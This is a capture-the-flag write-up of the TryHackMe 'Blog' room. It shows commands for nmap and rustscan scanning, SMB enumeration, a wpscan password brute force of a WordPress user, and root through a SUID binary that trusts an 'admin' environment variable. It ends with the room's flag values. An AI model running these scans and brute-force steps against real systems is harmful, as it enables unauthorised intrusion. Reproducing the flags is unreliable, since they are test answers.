Blog
Lab Setup
mkdir ~/Documents/TryHackMe/eJPT/Blog
cd ~/Documents/TryHackMe/eJPT/Blog
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}
export IP=10.10.245.192
export URL=http://$IP
Enumeration
To set up a domain for the room, the author recommends adding "blog.thm" to the /etc/hosts
file. This step is crucial for creating a designated domain for the machine.
To begin, perform a comprehensive scan of the machine's open ports using both rustscan
and nmap
. This dual approach ensures a thorough examination of the network, providing a more detailed understanding of the available services and potential vulnerabilities.
nmap
nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
rustscan
rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Before to access the website I try to get some info about shares using enum4linux
tool.
enum4linux $IP

smbclient -N //$IP/BillySMB
I downloaded three files, but they didn't contain useful information. Now, I'm moving on to check the website to see if there's anything there that could help.
We already found a user so I use wpscan
to brute force and get password for this user. After minutes of waiting I got nothing so I enumerate for users and I found another user -> kwheel
wpscan --url http://blog.thm/wp-login.php/ --passwords ~/Documents/rockyou.txt --usernames kwheel
Found the password for kwheel
user

Exploitation
In the room description, there's a crucial clue pointing to a specific CVE
that we need to leverage. This information is key to advancing in the challenge.
There are 2 methods to do this machine. We can use a script or metasploit
framework.
I get access on the machine and after a lot of enumeration I found a file with suid
tag -> /usr/sbin/checker
Let's download the file and employ reverse engineering tools and techniques to understand its functionality.

Upon examining the source code, it appears that setting the environment variable "admin" to 0 will grant root privileges when the code is executed. To proceed, simply set the "admin" variable to 0 before running the code. This should elevate the privileges as intended.
www-data@blog:/usr/sbin$ ./checker
./checker
Not an Admin
www-data@blog:/usr/sbin$ export admin='0'
export admin='0'
www-data@blog:/usr/sbin$ ./checker
./checker
root@blog:/usr/sbin# whoami
whoami
root
root@blog:/usr/sbin# cd /media
cd /media
root@blog:/media# cd usb
cd usb
root@blog:/media/usb# ls
ls
user.txt
root@blog:/media/usb# cat user.txt
cat user.txt
c8421899aae571f7af486492b71a8ab7
root@blog:/media/usb# cd /root
cd /root
root@blog:/root# ls
ls
root.txt
root@blog:/root# cat root.txt
cat root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
root@blog:/root#
Last updated